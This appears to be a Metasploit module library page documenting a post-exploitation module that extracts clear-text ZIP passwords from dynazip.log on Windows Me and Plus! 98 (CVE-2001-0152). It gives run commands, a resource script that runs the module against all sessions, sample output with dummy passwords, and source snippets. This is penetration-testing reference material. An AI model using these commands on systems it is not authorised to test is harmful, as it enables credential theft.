Windows Gather DynaZIP Saved Password Extraction - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/dynazip_log metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Source code: modules/post/windows/gather/credentials/dynazip_log.rb
Disclosure date: 2001-03-27
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2001-0152
This module extracts clear text credentials from dynazip.log. The log file contains passwords used to encrypt compressed zip files in Microsoft Plus! 98 and Windows Me.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/dynazip_log
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/dynazip_log
msf post(dynazip_log) > show options
... show and set options ...
msf post(dynazip_log) > set SESSION session-id
msf post(dynazip_log) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/dynazip_log")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This post-exploitation module extracts clear text credentials from dynazip.log.
The dynazip.log file is located in %WINDIR%
and contains log entries generated during encryption of Compressed Folders (zip files) in Microsoft® Plus! 98 and Windows® Me. Each log entry contains detailed diagnostic information generated during the encryption process, including the zip file name and the password used to encrypt the zip file in clear text.
Microsoft released details of the vulnerability in Microsoft Security Bulletin MS01-019 rated as Critical. A patch which disabled use of the log file was also released; however the patch failed to clear the contents of the existing log file.
Microsoft® Plus! 98 and Windows® Me are no longer supported by Microsoft.
Verification Steps
- Start
msfconsole
- Get meterpreter session
- Do:
use post/windows/gather/credentials/dynazip_log
- Do:
set SESSION <session id>
- Do:
run
- You should be able to see the extracted credentials in the module output
Example Run
Default Output
msf post(dynazip_log) > exploit
[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
ZIP Passwords
=============
File Path Password
--------- --------
C:\WINDOWS\Desktop\earthbound.zip fuzzy pickles
C:\WINDOWS\Desktop\private.zip priv8
C:\WINDOWS\Desktop\secret.zip my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip
[*] Post module execution completed
Verbose Output
msf post(dynazip_log) > set verbose true
verbose => true
msf post(dynazip_log) > exploit
[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[*] Processing log file (6614 bytes)
[*] Processing log entry for C:\WINDOWS\Desktop\secret.zip
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[*] Processing log entry for C:\WINDOWS\Desktop\private.zip
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[*] Processing log entry for C:\WINDOWS\Desktop\thepasswordisaspace.zip
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[*] Processing log entry for C:\WINDOWS\Desktop\earthbound.zip
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
[*] Processing log entry for C:\WINDOWS\Desktop\this file is not encrypted.zip
[*] Did not find a password
ZIP Passwords
=============
File Path Password
--------- --------
C:\WINDOWS\Desktop\earthbound.zip fuzzy pickles
C:\WINDOWS\Desktop\private.zip priv8
C:\WINDOWS\Desktop\secret.zip my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip
[*] Post module execution completed
Example Log Entry
An example dynazip.log log file entry is shown below:
--- DynaZIP ZIP Diagnostic Log - Version: 3.00.16 - 02/22/17 17:01:46 ---
Function: 5
lpszZIPFile: 0x00437538
C:\WINDOWS\Desktop\secret.zip
lpszItemList: 0x0059e878
"secret.txt"
lpMajorStatus: 0x00000000
lpMajorUserData: 0x00000000
lpMinorStatus: 0x00000000
lpMinorUserData: 0x00000000
dosifyFlag: 0
recurseFlag: 0
compFactor: 5
quietFlag: 1
pathForTempFlag: 0
lpszTempPath: 0x00000000
???
fixFlag: 0
fixHarderFlag: 0
includeVolumeFlag: 0
deleteOriginalFlag: 0
growExistingFlag: 0
noDirectoryNamesFlag: 0
convertLFtoCRLFFlag: 0
addCommentFlag: 0
lpszComment: 0x00000000
???
afterDateFlag: 0
lpszDate: 0x00000000
oldAsLatestFlag: 0
includeOnlyFollowingFlag: 0
lpszIncludeFollowing: 0x00000000
???
excludeFollowingFlag: 0
lpszExludeFollowing: 0x00000000
???
noDirectoryEntriesFlag: 0
includeSysHiddenFlag: 1
dontCompressTheseSuffixesFlag: 0
lpszStoreSuffixes: 0x00000000
???
encryptFlag: 1
lpszEncryptCode: 0x712185d4
my secret password!
lpMessageDisplay: 0x7120ca22
lpMessageDisplayData: 0x00000000
wMultiVolControl: 0x0000
wZipSubOptions: 0x0000
lResv1: 0x00000000
lResv2: 0x00000000
lpszExtProgTitle: 0x00000000
???
lpRenameProc: 0x71203919
lpRenameUserData: 0x0059eb8a
lpMemBlock: 0x004e3a0c
lMemBlockSize: 6
Go back to menu.
Msfconsole Usage
Here is how the windows/gather/credentials/dynazip_log post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/dynazip_log
msf6 post(windows/gather/credentials/dynazip_log) > show info
Name: Windows Gather DynaZIP Saved Password Extraction
Module: post/windows/gather/credentials/dynazip_log
Platform: Windows
Arch:
Rank: Normal
Disclosed: 2001-03-27
Provided by:
bcoles <[email protected]>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module extracts clear text credentials from dynazip.log. The
log file contains passwords used to encrypt compressed zip files in
Microsoft Plus! 98 and Windows Me.
References:
https://nvd.nist.gov/vuln/detail/CVE-2001-0152
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2001/MS01-019
https://packetstormsecurity.com/files/24543
https://support.microsoft.com/en-us/kb/265131
Module Options
This is a complete list of options available in the windows/gather/credentials/dynazip_log post exploitation module:
msf6 post(windows/gather/credentials/dynazip_log) > show options
Module options (post/windows/gather/credentials/dynazip_log):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/dynazip_log post exploitation module:
msf6 post(windows/gather/credentials/dynazip_log) > show advanced
Module advanced options (post/windows/gather/credentials/dynazip_log):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/dynazip_log module can do:
msf6 post(windows/gather/credentials/dynazip_log) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/dynazip_log post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/dynazip_log) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<LOG_PATH> not found
Here is a relevant code snippet related to the "<LOG_PATH> not found" error message:
34: creds = []
35:
36: log_path = "#{get_env("%WINDIR%")}\\dynazip.log"
37:
38: unless file?(log_path)
39: print_error("#{log_path} not found")
40: return
41: end
42:
43: print_good("Found DynaZip log file: #{log_path}")
44:
Log file is empty
Here is a relevant code snippet related to the "Log file is empty" error message:
43: print_good("Found DynaZip log file: #{log_path}")
44:
45: begin
46: log_data = read_file(log_path)
47: rescue EOFError
48: print_error('Log file is empty')
49: return
50: end
51:
52: vprint_status("Processing log file (#{log_data.length} bytes)")
53:
Did not find a password
Here is a relevant code snippet related to the "Did not find a password" error message:
68:
69: # In the event that the user selected a blank encryption password
70: # the ZIP file is not encrypted, however an empty line is written
71: # to the log file.
72: if passwd.to_s.eql?('')
73: vprint_status('Did not find a password')
74: next
75: end
76:
77: print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
78: creds << [zip_path, passwd]
No passwords were found in the log file
Here is a relevant code snippet related to the "No passwords were found in the log file" error message:
77: print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
78: creds << [zip_path, passwd]
79: end
80:
81: if creds.empty?
82: print_error('No passwords were found in the log file')
83: return
84: end
85:
86: table = Rex::Text::Table.new(
87: 'Header' => 'ZIP Passwords',
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11234 Merged Pull Request: revisionism
- #7994 Merged Pull Request: Add Windows Gather DynaZIP Saved Password Extraction post module
References
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/securecrt
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.